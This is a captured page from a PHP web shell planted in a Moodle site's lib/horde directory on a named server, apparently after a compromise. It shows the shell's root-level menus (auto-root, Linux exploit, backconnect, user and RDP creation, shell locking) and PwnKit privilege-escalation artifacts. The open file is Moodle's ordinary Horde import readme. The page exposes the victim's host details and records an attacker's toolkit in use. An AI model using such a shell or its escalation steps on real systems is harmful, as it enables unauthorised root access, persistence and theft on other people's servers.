Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
horde /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
1.66
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of import of Horde libraries # Clone the Horde Git Tools repository and install. You will need this for future updates: https://github.com/horde/git-tools # Make sure to follow the #Configuration step mentioned in the URL above. In particular make sure to set the 'git_base' config option in conf.php # Go into the repository cloned above and perform the following: bin/horde-git-tools git clone (Go for a coffee, this will take a while) # Checkout the latest stable version for all repos, currently 5.2: bin/horde-git-tools git checkout FRAMEWORK_5_2 # Copy the following script and store it on /tmp, change it's execute bit(chmod 777), and run it, passing in your path to Horde (the directory you've cloned the repository): /tmp/copyhorde.sh ~/git/base/directory/from/step/2 # Verify that these patches have been applied in the imported version. Apply them locally if not: - https://github.com/horde/Mail/pull/1 (Mail component). - https://github.com/horde/Imap_Client/pull/6 (IMAP Client component). - https://github.com/horde/Crypt_Blowfish/pull/1 (PHP 7.4 compatibility, Crypt_Blowfish) ==== #!/bin/sh source=$1 target=./lib/horde echo "Copy Horde modules from $source to $target" modules="Crypt_Blowfish Exception Idna Imap_Client Mail Mime Secret Socket_Client Stream Stream_Filter Stream_Wrapper Support Text_Flowed Translation Util" rm -rf $target/locale $target/framework mkdir -p $target/locale $target/framework/Horde for module in $modules do echo "Copying $module" cp -Rf $source/$module/lib/Horde/* $target/framework/Horde locale=$source/$module/locale if [ -d $locale ] then cp -Rf $locale/* $target/locale fi done
Close